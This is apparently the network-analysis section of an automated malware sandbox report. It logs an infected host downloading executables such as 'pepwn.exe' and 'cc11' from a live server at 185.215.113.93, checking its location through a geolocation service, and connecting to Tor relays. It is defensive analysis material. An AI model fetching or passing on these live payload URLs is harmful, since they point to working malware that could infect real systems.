Network Analysis
IP Address | Status | Action |
---|---|---|
130.185.250.214 | Active | Moloch |
131.188.40.189 | Active | Moloch |
141.255.162.34 | Active | Moloch |
149.56.45.200 | Active | Moloch |
164.124.101.2 | Active | Moloch |
173.75.39.61 | Active | Moloch |
185.215.113.93 | Active | Moloch |
193.11.164.243 | Active | Moloch |
212.83.168.196 | Active | Moloch |
23.129.64.201 | Active | Moloch |
46.105.121.228 | Active | Moloch |
Name | Response | Post-Analysis Lookup |
---|---|---|
api.wipmania.com | 212.83.168.196 |
- TCP Requests
-
-
192.168.56.101:49214 131.188.40.189:443
-
192.168.56.101:49211 149.56.45.200:9030
-
192.168.56.101:49212 173.75.39.61:9001
-
192.168.56.101:49200 185.215.113.93:80
-
192.168.56.101:49209 185.215.113.93:80
-
192.168.56.101:49216 185.215.113.93:80
-
192.168.56.101:49215 193.11.164.243:9030
-
192.168.56.101:49203 212.83.168.196:80api.wipmania.com
-
192.168.56.101:49205 212.83.168.196:80api.wipmania.com
-
192.168.56.101:49218 212.83.168.196:80api.wipmania.com
-
192.168.56.101:49208 23.129.64.201:80
-
192.168.56.101:49220 23.129.64.201:80
-
192.168.56.101:49213 46.105.121.228:9100
-
- UDP Requests
-
-
192.168.56.101:61479 164.124.101.2:53
-
192.168.56.101:62324 164.124.101.2:53
-
192.168.56.101:137 192.168.56.255:137
-
192.168.56.101:138 192.168.56.255:138
-
192.168.56.101:49152 239.255.255.250:3702
-
192.168.56.101:62325 239.255.255.250:3702
-
192.168.56.101:62445 239.255.255.250:1900
-
192.168.56.101:62447 239.255.255.250:3702
-
192.168.56.101:62449 239.255.255.250:3702
-
52.231.114.183:123 192.168.56.101:123
-
GET
200
http://185.215.113.93/pepwn.exe
REQUEST
RESPONSE
BODY
GET /pepwn.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Host: 185.215.113.93
HTTP/1.1 200 OK
Server: nginx
Date: Tue, 04 May 2021 02:17:24 GMT
Content-Type: application/octet-stream
Content-Length: 102912
Last-Modified: Sun, 02 May 2021 20:35:10 GMT
Connection: keep-alive
ETag: "608f0cfe-19200"
Accept-Ranges: bytes
GET
200
http://api.wipmania.com/
REQUEST
RESPONSE
BODY
GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Host: api.wipmania.com
HTTP/1.1 200 OK
Server: nginx
Date: Tue, 04 May 2021 02:17:31 GMT
Content-Type: text/html
Content-Length: 21
Connection: keep-alive
Keep-Alive: timeout=20
GET
200
http://api.wipmania.com/
REQUEST
RESPONSE
BODY
GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Host: api.wipmania.com
HTTP/1.1 200 OK
Server: nginx
Date: Tue, 04 May 2021 02:17:44 GMT
Content-Type: text/html
Content-Length: 21
Connection: keep-alive
Keep-Alive: timeout=20
GET
200
http://23.129.64.201/tor/status-vote/current/consensus.z
REQUEST
RESPONSE
BODY
GET /tor/status-vote/current/consensus.z HTTP/1.1
Cache-Control: no-cache
Accept-Encoding: gzip
Host: 23.129.64.201
Connection: Close
HTTP/1.0 200 OK
Date: Tue, 04 May 2021 02:17:51 GMT
Content-Type: text/plain
X-Your-Address-Is: 175.208.134.150
Content-Encoding: deflate
Expires: Tue, 04 May 2021 03:00:00 GMT
Vary: X-Or-Diff-From-Consensus
GET
200
http://185.215.113.93/cc11
REQUEST
RESPONSE
BODY
GET /cc11 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Host: 185.215.113.93
HTTP/1.1 200 OK
Server: nginx
Date: Tue, 04 May 2021 02:17:54 GMT
Content-Type: application/octet-stream
Content-Length: 103432
Last-Modified: Sun, 02 May 2021 18:15:21 GMT
Connection: keep-alive
ETag: "608eec39-19408"
Accept-Ranges: bytes
GET
200
http://185.215.113.93/cc11
REQUEST
RESPONSE
BODY
GET /cc11 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Host: 185.215.113.93
HTTP/1.1 200 OK
Server: nginx
Date: Tue, 04 May 2021 02:18:24 GMT
Content-Type: application/octet-stream
Content-Length: 103432
Last-Modified: Sun, 02 May 2021 18:15:21 GMT
Connection: keep-alive
ETag: "608eec39-19408"
Accept-Ranges: bytes
GET
200
http://185.215.113.93/cc22
REQUEST
RESPONSE
BODY
GET /cc22 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Host: 185.215.113.93
HTTP/1.1 200 OK
Server: nginx
Date: Tue, 04 May 2021 02:18:31 GMT
Content-Type: application/octet-stream
Content-Length: 103432
Last-Modified: Sun, 02 May 2021 18:20:42 GMT
Connection: keep-alive
ETag: "608eed7a-19408"
Accept-Ranges: bytes
GET
200
http://api.wipmania.com/
REQUEST
RESPONSE
BODY
GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Host: api.wipmania.com
HTTP/1.1 200 OK
Server: nginx
Date: Tue, 04 May 2021 02:18:33 GMT
Content-Type: text/html
Content-Length: 21
Connection: keep-alive
Keep-Alive: timeout=20
GET
200
http://23.129.64.201/tor/status-vote/current/consensus.z
REQUEST
RESPONSE
BODY
GET /tor/status-vote/current/consensus.z HTTP/1.1
Cache-Control: no-cache
Accept-Encoding: gzip
Host: 23.129.64.201
Connection: Close
HTTP/1.0 200 OK
Date: Tue, 04 May 2021 02:19:17 GMT
Content-Type: text/plain
X-Your-Address-Is: 175.208.134.150
Content-Encoding: deflate
Expires: Tue, 04 May 2021 03:00:00 GMT
Vary: X-Or-Diff-From-Consensus
ICMP traffic
No ICMP traffic performed.
IRC traffic
Command | Params | Type |
---|---|---|
CONNECT | %s:%s HTTP/1.0 | client |
CONNECT | %s:%s HTTP/1.1 | client |
Suricata Alerts
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLSv1 192.168.56.101:49213 46.105.121.228:9100 |
CN=www.bwngpox3bvalfmorvip.com | CN=www.rxshttafrocltee.net | d2:47:05:7d:2c:eb:e7:41:65:f3:7b:03:43:39:b6:ae:51:14:d3:42 |
TLSv1 192.168.56.101:49212 173.75.39.61:9001 |
CN=www.4y5zm6ezqlkhbs2ix.com | CN=www.5ul6h6l4.net | dd:c6:e9:d1:7f:2e:55:3b:46:92:22:14:6d:d3:0c:85:e3:5a:8d:b6 |
Snort Alerts
No Snort Alerts